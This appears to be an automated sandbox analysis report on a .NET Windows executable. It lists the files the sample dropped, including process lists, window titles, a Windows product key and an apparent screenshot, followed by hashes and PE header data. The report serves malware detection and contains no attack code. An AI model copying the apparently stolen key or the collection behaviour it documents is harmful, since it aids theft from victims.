                                                                                                                                                      Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                      Process:C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.698801429970146
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
                                                                                                                                                      MD5:488BC4EF686937916ECE6285266A6075
                                                                                                                                                      SHA1:498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
                                                                                                                                                      SHA-256:8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
                                                                                                                                                      SHA-512:1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ
                                                                                                                                                      Process:C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):282
                                                                                                                                                      Entropy (8bit):3.5191090305155277
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                                                                                                      MD5:3A37312509712D4E12D27240137FF377
                                                                                                                                                      SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                                                                                                      SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                                                                                                      SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                                                                                                                      Process:C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):190
                                                                                                                                                      Entropy (8bit):3.5497401529130053
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                                                                                                      MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                                                                                                      SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                                                                                                      SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                                                                                                      SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                                                                                                                      Process:C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):190
                                                                                                                                                      Entropy (8bit):3.5497401529130053
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                                                                                                      MD5:87A524A2F34307C674DBA10708585A5E
                                                                                                                                                      SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                                                                                                      SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                                                                                                      SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                                                                                                                      Process:C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):504
                                                                                                                                                      Entropy (8bit):3.514398793376306
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                                                                                                      MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                                                                                                      SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                                                                                                      SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                                                                                                      SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                                                                                                                      Process:C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):20375
                                                                                                                                                      Entropy (8bit):5.731336475773277
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:yqkVkgkiNukxk6qymujKS4c6Ycwx7Hk0k7fckij/t0Jxek1kfHPkHkPVjjkEkEkR:yhL9tkGDLDnq9vM464kpx2
                                                                                                                                                      MD5:49612951457F4A0E820F54AEABB15AB5
                                                                                                                                                      SHA1:70A11C1FB096B433CCBBA31093784015A8F722B6
                                                                                                                                                      SHA-256:561E84CCCF1D9EEFBF8882F423C7F3BAA01BB2EE5A400C8FDC5DB854A66DEAAA
                                                                                                                                                      SHA-512:BA1BA1FEE509E21762B0921AEBB10ED7C1ECDED90C67DE2CA36572F72A8C7BA052365EE5C6560A24E94DAB0B10B02D5C8FC77278F1D2283F710FD815EF2F84A0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:NAME: svchost..PID: 2584..EXE: C:\Windows\system32\svchost.exe..NAME: THUdlIuBGqsUa..PID: 5940..EXE: C:\Program Files (x86)\qwrLbLvsHqFqslHkONoQyTjeIzROHPmRaJYoXbnQexrcvyIIrBbxZiHFSPxtXAnJiLDonENM\THUdlIuBGqsUa.exe..NAME: THUdlIuBGqsUa..PID: 3440..EXE: C:\Program Files (x86)\qwrLbLvsHqFqslHkONoQyTjeIzROHPmRaJYoXbnQexrcvyIIrBbxZiHFSPxtXAnJiLDonENM\THUdlIuBGqsUa.exe..NAME: THUdlIuBGqsUa..PID: 6024..EXE: C:\Program Files (x86)\qwrLbLvsHqFqslHkONoQyTjeIzROHPmRaJYoXbnQexrcvyIIrBbxZiHFSPxtXAnJiLDonENM\THUdlIuBGqsUa.exe..NAME: THUdlIuBGqsUa..PID: 6884..EXE: C:\Program Files (x86)\qwrLbLvsHqFqslHkONoQyTjeIzROHPmRaJYoXbnQexrcvyIIrBbxZiHFSPxtXAnJiLDonENM\THUdlIuBGqsUa.exe..NAME: svchost..PID: 3520..EXE: C:\Windows\system32\svchost.exe..NAME: csrss..PID: 412..EXE: ..NAME: SgrmBroker..PID: 1176..EXE: ..NAME: Memory Compression..PID: 1568..EXE: ..NAME: THUdlIuBGqsUa..PID: 5144..EXE: C:\Program Files (x86)\qwrLbLvsHqFqslHkONoQyTjeIzROHPmRaJYoXbnQexrcvyIIrBbxZiHFSPxtXAnJiLDonENM\THUdlIuBGqsUa.exe..NA
                                                                                                                                                      Process:C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):29
                                                                                                                                                      Entropy (8bit):4.073329701949522
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:SoI2xlIyf0n:SoIWlIQO
                                                                                                                                                      MD5:5B13A01ECAA825490ED562699DBED985
                                                                                                                                                      SHA1:5CDBE2B349E9FF6FC4DFC962D1942D1180BEC878
                                                                                                                                                      SHA-256:07E0151E6EFF57383045FF016812A1A095BDF815192BECBBA230335EDC1C43FD
                                                                                                                                                      SHA-512:F36ECB349BC5632FBDAA3839CB20AFB1580061480395A239100B5DAA92FB442335A10A8D089DCA9EE045A1AA80006943924EAA3652FB563D1170C4948EE04DBA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:K8XNC-4HYGT-4T2X2-WMF3M-BQBDT
                                                                                                                                                      Process:C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):84
                                                                                                                                                      Entropy (8bit):4.6630509827051725
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                                                                                                                      MD5:58CD2334CFC77DB470202487D5034610
                                                                                                                                                      SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                                                                                                                      SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                                                                                                                      SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...
                                                                                                                                                      Process:C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):17178
                                                                                                                                                      Entropy (8bit):5.667865292437196
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:Yu/xZybjdkVH/DotA/cXFUWfvOoYkgPPesSP2W1xRdSCffqATB4/OBXDcLlZ1Wea:9y
                                                                                                                                                      MD5:BE1A8752D640387C114CEA98405422D3
                                                                                                                                                      SHA1:8F0ED5FBDF071309BE1FF7C9D3DC2C786413D7D1
                                                                                                                                                      SHA-256:DC42CBAA5B575D0A4344D6B6508F8A7004DE1B313D8EC9C467F54313E5D3A107
                                                                                                                                                      SHA-512:A18C203BEC84A5891E21A6537D9149840F2E44EC927065E617D4BADD0D6E3D5BAB2331D0140B1D074E9F90131649DF57FF7E297F97EFD6151F9AAB1FAB1687C8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:NAME: THUdlIuBGqsUa..TITLE: New Tab - Google Chrome..PID: 5940..EXE: C:\Program Files (x86)\qwrLbLvsHqFqslHkONoQyTjeIzROHPmRaJYoXbnQexrcvyIIrBbxZiHFSPxtXAnJiLDonENM\THUdlIuBGqsUa.exe..NAME: THUdlIuBGqsUa..TITLE: New Tab - Google Chrome..PID: 3440..EXE: C:\Program Files (x86)\qwrLbLvsHqFqslHkONoQyTjeIzROHPmRaJYoXbnQexrcvyIIrBbxZiHFSPxtXAnJiLDonENM\THUdlIuBGqsUa.exe..NAME: THUdlIuBGqsUa..TITLE: New Tab - Google Chrome..PID: 6024..EXE: C:\Program Files (x86)\qwrLbLvsHqFqslHkONoQyTjeIzROHPmRaJYoXbnQexrcvyIIrBbxZiHFSPxtXAnJiLDonENM\THUdlIuBGqsUa.exe..NAME: THUdlIuBGqsUa..TITLE: New Tab - Google Chrome..PID: 6884..EXE: C:\Program Files (x86)\qwrLbLvsHqFqslHkONoQyTjeIzROHPmRaJYoXbnQexrcvyIIrBbxZiHFSPxtXAnJiLDonENM\THUdlIuBGqsUa.exe..NAME: THUdlIuBGqsUa..TITLE: New Tab - Google Chrome..PID: 5144..EXE: C:\Program Files (x86)\qwrLbLvsHqFqslHkONoQyTjeIzROHPmRaJYoXbnQexrcvyIIrBbxZiHFSPxtXAnJiLDonENM\THUdlIuBGqsUa.exe..NAME: THUdlIuBGqsUa..TITLE: New Tab - Google Chrome..PID: 3848..EXE: C:\Program
                                                                                                                                                      Process:C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):85732
                                                                                                                                                      Entropy (8bit):7.8474746625326555
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:Cp8VNFP4/fP1XLdH2mAYnUp2RW4sEURj9lANI01faoB5xoqbB2KAAjVDTYENkDDh:O2NR4/fdXLdHdSpXeU7+IEfjBcqbvjqZ
                                                                                                                                                      MD5:DA2A5C11B2380C6B182B4B2AC7716553
                                                                                                                                                      SHA1:B6432B9E48A40ACFFABDDBDC806D646385E4573D
                                                                                                                                                      SHA-256:47D6BA46C0C90A7A1F6481C5FE94ACAD7531F05A9ABE8F5C72D67C29335E90E8
                                                                                                                                                      SHA-512:6A0453E121EBF98129F4896B65DD5AEFD61246122784FFFA73288BFEF8B78F999217B62EA4889A5E6EB0027638F27998549B63A857D745A59B63D6EEBAC1041A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(.........k.._:U.d..2.v..G..\^)a.........Q.......?.A.9..@...'...G. .....w.G.....;.n..3...W...:<r.]...yl......6A
                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Entropy (8bit):5.8967834038590885
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                      File name:cOH7jKmo25.exe
                                                                                                                                                      File size:179'200 bytes
                                                                                                                                                      MD5:f69889d705f5d72d65661b48535ae1b3
                                                                                                                                                      SHA1:4c8f3cf14130e6519339a370bba4527ecb012cde
                                                                                                                                                      SHA256:153a321e178bc28e0f2c6432763bb44fc47b573596387ec241ca45d8775e12af
                                                                                                                                                      SHA512:a182272541b22dd58d44db506f0c3368fd0e54d0e616d48b6980563eb12d8d9a377bb0d0272c0c2576d36359f10367e27043d3c3106e5d985be0843112fedb3d
                                                                                                                                                      SSDEEP:3072:Ke8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gT8wARE+WpCc:66ewwIwQJ6vKX0c5MlYZ0b2R
                                                                                                                                                      TLSH:3F045B5837D80A15F3BE5FB8F4B012118B75B477AA1AE75F08E920EE0D62351E911FA3
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.g................................. ........@.. ....................... ............`................................
                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                      Entrypoint:0x42d1be
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                      Time Stamp:0x671A3F87 [Thu Oct 24 12:37:27 2024 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                      Instruction
                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2d16c0x4f.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x600.rsrc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x300000xc.reloc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                      .text0x20000x2b1c40x2b2003294ae4070f72ea38efc47b34affdf14False0.46042798913043476data5.924259553322092IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rsrc0x2e0000x6000x600ccd2ec796af2f339686e45e5513c2cafFalse0.4140625data4.029504312109572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .reloc0x300000xc0x2008e19c1ec6db51c8435749ecf42a022c8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                      RT_VERSION0x2e0a00x30cdata0.4269230769230769
